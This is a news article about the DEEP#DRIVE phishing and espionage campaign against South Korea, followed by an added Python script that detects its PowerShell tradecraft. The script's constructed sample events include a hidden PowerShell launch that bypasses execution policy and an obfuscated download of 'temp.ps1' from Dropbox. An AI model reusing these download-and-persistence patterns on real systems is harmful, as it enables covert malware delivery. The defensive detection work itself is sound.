N. Korean Hackers Suspected in DEEP#DRIVE Attacks Against S. Korea


A phishing attack dubbed DEEP#DRIVE is targeting South Korean entities, with thousands already affected. North Korean hackers from the Kimsuky group are the prime suspects behind this cyber espionage campaign.

Securonix has shared its investigation into the DEEP#DRIVE attack campaign, a multi-stage operation targeting South Korean businesses, government entities, and cryptocurrency users since September 2024. The attack’s primary objective is most likely espionage to gather sensitive information from South Korean entities and has already claimed thousands of victims.

The investigation, shared with Hackread.com ahead of publication, reveals that the attackers employed tailored phishing lures written in Korean and disguised as legitimate documents, such as work logs, insurance documents, and crypto-related files, to infiltrate targeted environments.

Securonix has shared an image of a phishing lure disguised as the Telegram.exe application, labelled 대차 및 파레트 (Korean for bogie and pallet), revealing logistics-related details such as product name (제품명), P9 basement factory (P9 지하공장), and total weight (총중량), indicating a likely attempt to trick victims in the logistics sector.

These lures, crafted to appeal to their intended audience, were often distributed in trusted file formats like .hwp, .xlsx, and .pptx and hosted on widely used platforms like Dropbox, allowing attackers to evade traditional security defences and “blend into normal user behaviour.”

“It is evident that phishing was the primary method of malware distribution in this campaign as the collected samples and their filenames strongly align with common themes and wording typically used in phishing lures,” Securonix’s researchers explained in their report.

Campaign Analysis

The campaign heavily leveraged PowerShell scripts for payload delivery, reconnaissance (gathering system info like IP address, OS details, antivirus software, and running processes), and establishing persistence (using scheduled tasks like “ChromeUpdateTaskMachine”). Dropbox was also used for data exfiltration.  

The attack chain typically begins with a .lnk file disguised as a legitimate document, which initiates the execution of malicious PowerShell scripts. These scripts download further payloads, including a .NET assembly, disguised as a legitimate application (such as “Telegram.exe”), and establish persistence. A key reconnaissance script, “system_first.ps1,” collects and exfiltrates system information.  

The final payload, often delivered via a script like “temp.ps1,” is suspected to be a backdoor, though researchers could not capture it during analysis. Analysis of the attackers’ Dropbox account showed a large number of compromised system configuration files and various malicious payloads.

Stealth and obfuscation are key elements: the attackers used techniques such as meaningless variable names, repeated irrelevant assignments, and string concatenation to evade detection. The removal of the associated Dropbox links suggests the attack infrastructure was temporary.

Although the attacker’s infrastructure, particularly Dropbox links, appeared short-lived, the tactics, techniques, and procedures (TTPs) strongly resemble those used by Kimsuky, a North Korean Advanced Persistent Threat (APT) group “known for targeting South Korea and using similar Dropbox-based methods in previous campaigns,” researchers observed.

Securonix recommends user education on phishing, monitoring of malware staging directories, and reliable endpoint logging (e.g. PowerShell logging) to defend against similar attacks.
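The recommendations above (PowerShell logging, watching staging directories) can be turned into concrete checks. The script below is an added example written for this article, not Securonix’s detection content, and runs a few heuristics over constructed log records that approximate three Windows event types: process creation (Security 4688), scheduled-task creation (Security 4698), and PowerShell script block logging (Microsoft-Windows-PowerShell 4104). The field names (`new_process`, `command_line`, `task_name`, `task_content`, `script_block`), the sample script contents, and the hypothetical user `u` are simplified assumptions, not real captures. The heuristics map to tradecraft described in the article: PowerShell launched from a user-writable staging directory with a hidden window or ExecutionPolicy bypass, an update-themed scheduled task such as “ChromeUpdateTaskMachine” whose action runs PowerShell, and script blocks showing junk variable names, repeated identical assignments, and Dropbox URLs reassembled from concatenated string fragments.

```python
"""Heuristic detections for DEEP#DRIVE-style PowerShell tradecraft.

Added example, not Securonix's detection content. Event records are
constructed, simplified approximations of Windows 4688/4698/4104 events.
"""
import json
import re

# Constructed sample log lines (JSON per line); not real captures.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"event_id": 4688,
     "new_process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_process": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -w hidden -ep bypass -f C:\Users\u\AppData\Local\Temp\system_first.ps1"},
    {"event_id": 4104,
     "script_block": "$a1x = 'https://www.drop' + 'box.com/scl/fi/' + 'x/temp.ps1'; "
                     "$q9z = 1; $q9z = 1; $b2y = New-Object Net.WebClient; $b2y.DownloadString($a1x)"},
    {"event_id": 4698, "task_name": r"\ChromeUpdateTaskMachine",
     "task_content": r"powershell.exe -f C:\Users\u\AppData\Local\Temp\temp.ps1"},
    {"event_id": 4104,
     "script_block": r"Get-ChildItem -Path C:\Projects | Where-Object { $_.Length -gt 1MB }"},
    {"event_id": 4698, "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "task_content": "defrag.exe -c"},
]]

CONCAT_RE = re.compile(r"'\s*\+\s*'")                 # 'abc' + 'def' joins
ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*([^;]+)")       # $var = value
JUNK_VAR_RE = re.compile(r"\$([A-Za-z]\d\w{0,2})\b")    # e.g. $a1x, $q9z
STAGING_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Downloads|Public)\\", re.I)
PS_FLAGS_RE = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass)", re.I)


def deobfuscate_concat(block: str) -> str:
    """Join adjacent quoted fragments so split URLs become searchable."""
    return CONCAT_RE.sub("", block)


def score_script_block(block: str) -> list:
    """Return the obfuscation indicators found in one 4104 script block."""
    reasons = []
    joins = len(CONCAT_RE.findall(block))
    if joins >= 2:
        reasons.append(f"{joins} quoted-string concatenations")
    junk = set(JUNK_VAR_RE.findall(block))
    if len(junk) >= 2:
        reasons.append(f"junk variable names: {sorted(junk)}")
    assigns = [m.group(0).strip() for m in ASSIGN_RE.finditer(block)]
    if len(assigns) != len(set(assigns)):
        reasons.append("repeated identical assignments")
    if "dropbox.com" in deobfuscate_concat(block).lower():
        reasons.append("Dropbox URL (after joining concatenated strings)")
    return reasons


def check_event(idx: int, ev: dict) -> list:
    """Apply the rule matching this event type; return (rule, index, reasons) tuples."""
    eid = ev.get("event_id")
    reasons = []
    if eid == 4688 and ev.get("new_process", "").lower().endswith("powershell.exe"):
        cmd = ev.get("command_line", "")
        if STAGING_RE.search(cmd):
            reasons.append("script in user-writable staging directory")
        if PS_FLAGS_RE.search(cmd):
            reasons.append("hidden window / ExecutionPolicy bypass")
        return [("powershell_launch", idx, reasons)] if reasons else []
    if eid == 4104:
        reasons = score_script_block(ev.get("script_block", ""))
        return [("obfuscated_script_block", idx, reasons)] if reasons else []
    if eid == 4698:
        name, action = ev.get("task_name", "").lower(), ev.get("task_content", "")
        if ("chrome" in name or "update" in name) and "powershell" in action.lower():
            reasons.append("update-themed task name runs PowerShell")
        if STAGING_RE.search(action):
            reasons.append("task action from user-writable staging directory")
        return [("suspicious_scheduled_task", idx, reasons)] if reasons else []
    return []


def scan(lines: list) -> list:
    """Run every check over JSON-per-line event records."""
    findings = []
    for idx, line in enumerate(lines):
        findings.extend(check_event(idx, json.loads(line)))
    return findings


if __name__ == "__main__":
    for rule, idx, why in scan(SAMPLE_EVENTS):
        print(f"[{rule}] event #{idx}: {'; '.join(why)}")
```

On the constructed sample the scanner flags exactly three events (the PowerShell launch, the obfuscated downloader block, and the Chrome-themed task) and leaves the benign directory listing and the built-in defrag task alone. The thresholds (two concatenations, two junk-looking variable names) are deliberately loose starting points; real deployments should tune them against a baseline of the environment’s own administrative scripts before alerting.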
